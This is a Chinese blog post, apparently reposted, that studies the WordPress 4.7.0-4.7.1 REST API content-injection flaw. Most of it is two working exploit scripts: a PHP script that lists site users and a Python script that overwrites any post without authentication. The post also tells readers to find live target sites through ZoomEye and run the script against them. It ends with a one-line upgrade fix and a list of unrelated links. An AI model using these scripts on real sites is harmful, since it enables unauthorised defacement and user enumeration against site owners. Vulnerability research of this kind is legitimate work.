wordpress4.7.0-4.7.1内容注入漏洞研究
来源:互联网 发布:阿里云ssl证书购买 编辑:程序博客网 时间:2024/06/05 13:32
wordpress4.7.0-4.7.1内容注入漏洞研究
一、获取user
1.影响:未授权获取发布过文章的其他用户的用户名、id
2.触发前提: wordpress配置REST API
3.影响版本:<= 4.7
4.漏洞说明: Get请求什么都不用做就可以避开wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php 的逻辑判断,返回ture,程序继续执行query,REST API接口查询后以json格式在前端显示。能够获取到用户的一些信息。 请求地址:http://127.0.0.1/wordpress-4.7.1/wp-json/wp/v2/users/
5.exploit:
<?php#Author: Mateus a.k.a Dctor#fb: fb.com/hatbashbr/#E-mail: dctoralves@protonmail.ch#Site: https://mateuslino.tk header ('Content-type: text/html; charset=UTF-8');$url= "http://xxxx.cn/";$payload="wp-json/wp/v2/users/";$urli = file_get_contents($url.$payload);$json = json_decode($urli, true);if($json){ echo "*-----------------------------*\n";foreach($json as $users){ echo "[*] ID : |" .$users['id'] ."|\n"; echo "[*] Name: |" .$users['name'] ."|\n"; echo "[*] User :|" .$users['slug'] ."|\n"; echo "\n";}echo "*-----------------------------*";} else{echo "[*] No user";}?>
6.效果:
二、未授权而更改任意文章
1.影响:未授权获取发布过文章的其他用户的用户名、id
2.触发前提: wordpress配置REST API
**3.影响版本:**wp4.7.0-4.7.1
4.漏洞说明: 由于服务器配置的REST API存在漏洞,导致WordPress所有文章内容可以未经验证被查看,修改,删除,甚至创建新的文章
5.exploit:
import jsonimport sysimport urllib2from lxml import etreedef get_api_url(wordpress_url): response = urllib2.urlopen(wordpress_url) data = etree.HTML(response.read()) u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0] # check if we have permalinks if 'rest_route' in u: print(' ! Warning, looks like permalinks are not enabled. This might not work!') return udef get_posts(api_base): respone = urllib2.urlopen(api_base + 'wp/v2/posts') posts = json.loads(respone.read()) for post in posts: print(' - Post ID: {0}, Title: {1}, Url: {2}' .format(post['id'], post['title']['rendered'], post['link']))def update_post(api_base, post_id, post_content): # more than just the content field can be updated. see the api docs here: # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post data = json.dumps({ 'content': post_content }) url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id) req = urllib2.Request(url, data, {'Content-Type': 'application/json'}) response = urllib2.urlopen(req).read() print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))def print_usage(): print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))if __name__ == '__main__': # ensure we have at least a url # if we have a post id, we need content too print('* Discovering API Endpoint') api_url = get_api_url(sys.argv[1]) print('* API lives at: {0}'.format(api_url)) # if we only have a url, show the posts we have have # if we get here, we have what we need to update a post! print('* Updating post {0}'.format(sys.argv[2])) #with open(sys.argv[3], 'r') as content: # new_content = content.readlines() new_content='fff' update_post(api_url, sys.argv[2], new_content) print('* Update complete!')
6.漏洞测试:
6.1 先用zoomeye搜一个靶机
6.2 说明:脚本test.py同目录下创建一个content文件,里面放需要修改的内容
执行脚本:python test.py url 1 content(url为攻击目标这里就不给出了)
ps:这个脚本最好在linux下执行,windows下需要改一下。
7 最后效果图
8 修复建议:升级到最新版wp
9 最后总结:由api漏洞引起的未授权操作应该引起注意,在以后的漏洞研究中应多关注此类漏洞。关于代码方面,大概看了一下,主要还是由于程序员代码逻辑问题导致了未授权操作的发生。
- wordpress4.7.0-4.7.1内容注入漏洞研究
- 【漏洞分析】WordPress REST API 内容注入漏洞分析
- WordPress4.8.1版本存在XSS跨站攻击漏洞
- 新浪sae上安装原生wordpress4.1
- WordPress4.1英文版转中文版
- Mac下安装Wordpress4.1英文版
- 新曝WordPress REST API内容注入漏洞详解
- SQL注入漏洞攻防必杀技 1
- SQL注入漏洞全接触【1】
- WordPress < 3.6.1 PHP 对象注入漏洞
- 数据库注入漏洞【续】
- Sql 注入漏洞,注意
- SQL注入漏洞
- sql注入漏洞原理
- 数据库注入漏洞
- SQL 注入漏洞新动向
- dedecms最新注入漏洞
- SQL注入漏洞接触
- LeetCode#8 String to Integer (atoi)
- Python 离线安装cx_Oracle
- LeetCode#9* Palindrome Number
- 爷孙共庆生日,其乐融融
- 后缀自动机SAM
- wordpress4.7.0-4.7.1内容注入漏洞研究
- 测试
- Redis主从配置异常解决:Error condition on socket for SYNC: Connection refused
- EasyUI管理后台模板(附源码)
- Java学习笔记系列05
- Spring Data Redis(Support Classes)
- alsa 音频配置 7 16
- 读书笔记—JavaScript高级程序设计(一)
- 简单的springboot项目搭建